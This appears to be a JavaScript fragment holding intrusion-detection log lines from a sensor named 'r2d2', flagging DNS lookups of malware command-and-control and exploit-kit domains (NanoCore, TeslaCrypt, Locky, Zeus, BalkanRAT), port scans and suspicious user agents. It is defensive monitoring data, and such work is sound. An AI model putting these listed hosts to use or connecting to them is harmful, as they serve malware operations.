    '"2021-01-11 00:16:12.058829" r2d2 10.3.160.42 22865 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:16:12.156409" r2d2 10.3.160.42 22865 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:16:12.255663" r2d2 10.3.160.42 22865 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:16:12.458641" r2d2 10.3.160.42 22865 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:16:12.755238" r2d2 10.3.160.42 22865 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:16:31.531601" r2d2 2.200.110.232 64575 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:16:31.559919" r2d2 2.200.110.233 65130 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:16:30.333784" r2d2 10.1.19.42 58950 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:16:43.384602" r2d2 2.200.107.146 14363 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:16:43.382439" r2d2 2.200.110.232 65083 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:16:42.217630" r2d2 178.17.174.14 35084 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FBSMTWB; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:16:59.608400" r2d2 2.200.110.232 63631 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:17:40.452220" r2d2 2.200.97.1 51983 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:17:41.563003" r2d2 2.200.110.232 65129 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:17:41.594094" r2d2 2.200.110.233 63762 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:17:59.609078" r2d2 2.200.110.232 49257 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:17:59.613829" r2d2 2.200.107.146 12984 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:18:02.066435" r2d2 2.200.110.232 65300 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:18:02.119240" r2d2 2.200.110.233 49253 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:18:12.246701" r2d2 10.3.160.42 22866 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:18:12.345397" r2d2 10.3.160.42 22866 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:18:12.647570" r2d2 10.3.160.42 22866 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:18:14.444935" r2d2 10.3.160.42 22866 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:18:14.831325" r2d2 10.44.70.211 51155 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;bfaceb91-6871-400d-88d4-0eda679b36a6;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:18:43.402056" r2d2 2.200.110.232 65456 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:18:43.406131" r2d2 2.200.110.232 64167 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:18:43.410784" r2d2 2.200.107.146 30021 212.18.248.42 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:18:51.602421" r2d2 2.200.110.233 65435 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:18:59.631044" r2d2 2.200.110.232 64186 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:18:59.635852" r2d2 2.200.107.146 5995 192.48.79.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 00:19:34.125939" r2d2 10.1.19.42 58952 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:19:43.382740" r2d2 2.200.110.232 63553 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:19:43.385510" r2d2 2.200.107.146 63322 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:19:59.634950" r2d2 2.200.110.232 64312 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:19:59.642722" r2d2 2.200.107.146 40715 217.115.6.76 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:19:59.635824" r2d2 2.200.110.232 64513 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:19:59.642873" r2d2 2.200.107.146 24998 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:20:01.609749" r2d2 2.200.110.233 63764 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:20:50.813153" r2d2 10.8.160.51 56412 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:20:50.837541" r2d2 10.8.160.51 56412 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:20:59.607493" r2d2 2.200.110.232 64950 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:20:59.609883" r2d2 2.200.107.146 10418 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:20:50.813151" r2d2 10.8.160.51 56412 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:21:07.394034" r2d2 10.38.194.125 61232 10.1.194.234 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 00:21:07.970903" r2d2 2.200.110.233 64136 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:21:08.169989" r2d2 2.200.110.232 64853 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:21:08.171908" r2d2 2.200.107.146 4984 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:21:08.198583" r2d2 2.200.110.233 64842 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:21:08.341350" r2d2 2.200.110.233 63552 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:21:11.582159" r2d2 2.200.110.233 65295 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:21:11.620128" r2d2 2.200.110.232 64346 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:21:11.621744" r2d2 2.200.107.146 8620 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:21:28.644683" r2d2 2.200.110.233 64514 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:21:28.646315" r2d2 2.200.107.146 37301 173.201.68.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:21:29.999512" r2d2 2.200.110.233 63828 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:21:30.001981" r2d2 2.200.107.146 8271 193.232.156.17 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:21:55.000061" r2d2 45.95.202.106 35196,37704,44356,44732,46940,49008,50256,52484,53476,54094,57690,59742 2.200.103.85 3000,6001,6004,8000,8081,8082,8090,9000,9200,10000,50001,60001 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:21:56.000525" r2d2 45.95.202.106 35196,37742,40046,41336,41694,43170,44732,46470,46940,52006,57542 2.200.103.85 80,82,83,84,1024,2000,3000,6001,8082,8083,8084 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:21:56.000521" r2d2 45.95.202.106 36892,44144,45910,46492,48714,50198,50256,56848,59742,59928,60002 2.200.103.85 81,85,86,88,89,90,91,6003,8080,8081,8090 TCP IP 45.95.202.106 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:22:12.624691" r2d2 10.3.160.42 22868 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:22:12.728184" r2d2 10.3.160.42 22868 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:22:12.824613" r2d2 10.3.160.42 22868 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:22:13.028657" r2d2 10.3.160.42 22868 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:22:13.324612" r2d2 10.3.160.42 22868 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:22:17.981271" r2d2 2.200.110.232 64259 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:22:17.983671" r2d2 2.200.107.146 24271 192.48.79.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:22:18.021434" r2d2 2.200.110.233 64203 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:22:20.478705" r2d2 2.200.110.233 63626 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 00:22:21.651091" r2d2 2.200.110.232 63769 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:22:21.690454" r2d2 2.200.110.233 63455 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:22:23.312231" r2d2 2.200.109.177 25706 108.163.130.184 5655 TCP IPORT 108.163.130.184:5655 "rmsrat (malware)" (static)\n' +
    '"2021-01-11 00:22:26.693181" r2d2 2.200.110.233 49188 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:22:40.737742" r2d2 2.200.97.1 53700 8.8.8.8 53 UDP DNS checkip.dyndns.com "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 00:22:43.381562" r2d2 2.200.110.232 49186 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:22:41.885812" r2d2 2.200.106.65 37488 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:22:41.918797" r2d2 2.200.106.65 37488 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:22:41.850592" r2d2 2.200.106.65 37488 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:22:44.467800" r2d2 2.200.106.65 37488 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:22:46.894567" r2d2 2.200.106.65 37488 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:23:02.495550" r2d2 2.200.105.140 13632 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:23:02.513595" r2d2 2.200.105.140 13632 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:23:02.531966" r2d2 2.200.105.140 13632 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:23:04.325472" r2d2 2.200.105.140 13632 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:23:31.091283" r2d2 2.200.110.233 64596 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:23:31.092911" r2d2 2.200.107.146 30926 45.175.22.4 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:23:31.695093" r2d2 2.200.110.232 63681 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:23:31.723037" r2d2 2.200.110.233 63391 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:23:32.000172" r2d2 2.200.108.59 19591,19592,19598,19603,19605,19606,19609,33040,33186,33326,34464,34576,34976,35332,37466,37467,37468,37558,38234,38804,39004,39148,41016,41418,41442,41664,41856,41916,42786,42944,43826,43827,43828,43829,44850,47218,47528,48320,48842,49640,50050,50738,51918,52042,52420,52692,54648,54944,56152,57542,57742,58716,59236,59284,60406,60654,60774 77.53.81.105 21,5436,6080,6109,6675,6763,7553,9911,15336,17536,19356,20433,22047,25217,26861,28607,28708,32890,33794,34344,34639,35884,36054,36399,36416,36653,38088,38769,41904,44812,45016,46281,48206,48444,48714,48722,50164,51583,53419,54342,55050,55998,58370,64688 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:23:31.000074" r2d2 2.200.108.59 19577,19581,19582,19585,19587,19588,19589,19590,19592,19595,19596,19597,19600,19603,19604,19605,19608,32808,33040,33070,34060,34464,34538,34576,34866,34976,35080,35246,36132,37462,38438,38832,39744,40360,40942,41016,41032,41432,41646,43368,43422,43454,43822,43823,43824,43825,43830,44278,44298,44644,44664,44750,45150,45940,47120,47218,47474,47566,47638,47872,48320,48852,49222,49640,50706,50738,51010,51836,52420,53452,53816,54196,54506,54944,55388,55424,55682,56256,56874,57172,57542,57886,57994,58716,59284,59606,59708,59970,60104,60774 77.53.81.105 21,5609,6763,7013,7085,7502,7553,9286,11029,11044,11529,11804,12076,12191,12754,13586,15149,15687,17536,19356,19892,20735,21087,23109,23956,25718,25782,26791,26861,27603,28404,29784,30267,32890,34344,35884,36020,36399,37107,37914,40245,40469,44260,44812,44868,46391,48206,48714,48722,50507,51583,51756,53339,53515,53885,54342,54371,54791,58802,58895,61006,61697,62177,62792,62970,63276,63578,64907,65295 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:23:31.000061" r2d2 2.200.108.59 19577,19578,19580,19583,19584,19586,19587,19589,19590,19594,19595,19597,19598,19599,19600,19601,19602,19606,19607,19608,33186,33326,33760,34060,34230,34538,35080,35246,35332,36132,36472,36970,37422,37463,37464,37465,37466,37468,38234,38438,38832,39744,40836,41032,41418,41812,41846,41856,42186,42866,42944,43152,43318,43368,43822,43827,43829,43830,44850,45046,45160,45362,45464,46386,47394,47474,47638,47872,47876,48842,49222,50050,50706,51482,51618,52042,52692,53108,53650,53816,53982,54648,54868,55682,55982,56256,57172,57462,57742,58404,58934,59032,59708,59950,60104 77.53.81.105 21,5436,5609,6675,7013,7502,7934,8826,9911,11029,11044,11365,11529,11804,12754,13297,13586,14834,15149,15336,16205,17297,18713,19892,20433,21087,21384,22643,23351,23917,23956,25452,25875,26788,26791,28708,29247,34280,34639,34752,35070,35390,35640,36653,38088,38769,41833,44182,44260,44868,45238,46281,47179,51831,51916,53339,54371,55998,56177,56905,57329,58312,58370,61614,62792,63578,64688,64907 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:23:34.000580" r2d2 2.200.108.59 33760,37700,41796,43152,43584,44750,45046,46522,47120,48580,50518,51118,51618,51836,57258,57886,58934,59606,59950,59970 77.53.81.105 7085,8826,21384,22643,28404,28698,29221,33001,34280,37107,38802,42350,53885,56553,57329,58312,59197,61006,63224,63276 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 00:23:59.610528" r2d2 2.200.110.232 65529 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:24:01.105125" r2d2 2.200.109.50 62397 8.8.8.8 53 UDP DNS (sv1.iotak).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:24:20.735103" r2d2 10.1.19.42 58955 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:31.616130" r2d2 178.17.174.14 33572 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2; SynapseWorkstation.3.2.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:31.616132" r2d2 178.17.174.14 33572 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2; SynapseWorkstation.3.2.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:37.375665" r2d2 2.200.110.232 65452 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:24:37.375552" r2d2 2.200.110.232 64074 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:24:37.381567" r2d2 2.200.107.146 5063 192.42.93.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:24:37.424463" r2d2 2.200.110.233 63806 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 00:24:37.437078" r2d2 2.200.110.232 64910 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:24:37.442592" r2d2 2.200.107.146 56377 212.18.249.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:24:37.445716" r2d2 2.200.110.232 63394 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:24:37.488478" r2d2 2.200.110.233 64071 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:24:37.526895" r2d2 2.200.110.232 49155 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:24:37.532270" r2d2 2.200.107.146 13294 173.201.76.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:24:37.625378" r2d2 2.200.110.232 63676 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 00:24:37.837379" r2d2 2.200.110.232 63384 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:24:37.839047" r2d2 2.200.107.146 7517 192.52.178.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:24:37.876940" r2d2 2.200.110.233 65387 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:24:38.015381" r2d2 2.200.110.232 64482 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:24:38.226249" r2d2 2.200.110.232 65040 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 00:24:38.435476" r2d2 2.200.110.232 64508 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 00:24:31.616115" r2d2 178.17.174.14 33572 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2; SynapseWorkstation.3.2.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:41.287512" r2d2 2.200.110.232 64975 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:24:41.744064" r2d2 2.200.110.232 63817 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:24:41.776961" r2d2 2.200.110.233 49315 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:24:41.796186" r2d2 2.200.110.232 64282 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 00:24:42.670171" r2d2 2.200.105.140 59580 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:42.019144" r2d2 2.200.105.140 59580 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:46.783250" r2d2 10.8.0.51 54414 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:41.694747" r2d2 2.200.105.140 59580 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:46.798636" r2d2 10.8.0.51 54414 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:45.954816" r2d2 2.200.105.140 59580 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:46.783248" r2d2 10.8.0.51 54414 10.1.20.238 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:24:46.281902" r2d2 2.200.105.140 59580 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:25:06.020608" r2d2 2.200.110.232 63735 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:25:07.493010" r2d2 2.200.110.232 63553 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:25:07.495505" r2d2 2.200.107.146 24090 205.251.193.223 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 00:25:09.388263" r2d2 2.200.106.65 49824 2.200.107.168 53 UDP DNS (charlottefamilyyogacenter).com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:25:09.403828" r2d2 2.200.106.65 65093 2.200.107.168 53 UDP DNS (charlottefamilyyogacenter).com "long domain (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:25:09.708132" r2d2 2.200.107.168 53 2.200.106.65 50323 UDP DNS (casalemodels).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:25:26.424699" r2d2 2.200.110.232 49403 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 00:25:43.384602" r2d2 2.200.107.146 46480 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:25:43.382881" r2d2 2.200.110.232 64502 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 00:25:43.400048" r2d2 2.200.110.232 63824 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:25:55.459227" r2d2 2.200.107.168 53 2.200.110.232 63421 UDP DNS (bcsservices).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:25:55.459221" r2d2 2.200.107.168 53 2.200.110.232 63421 UDP DNS (bcsservices).com "parked site (suspicious)" (heuristic)\n' +
    '"2021-01-11 00:26:06.140855" r2d2 2.200.110.233 49312 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 00:26:06.976671" r2d2 2.200.110.233 64271 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 00:26:07.054571" r2d2 2.200.110.233 63808 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 00:26:40.524421" r2d2 2.200.110.232 65314 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:26:40.534597" r2d2 2.200.107.146 62666 173.245.58.63 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:26:40.550120" r2d2 2.200.110.233 65294 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:26:40.963714" r2d2 2.200.110.232 64103 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:26:40.971525" r2d2 2.200.107.146 63103 108.162.193.92 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 00:26:41.572784" r2d2 2.200.105.226 59120 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:26:41.572804" r2d2 2.200.105.226 59120 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 00:26:46.489130" r2d2 2.200.110.232 65124 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
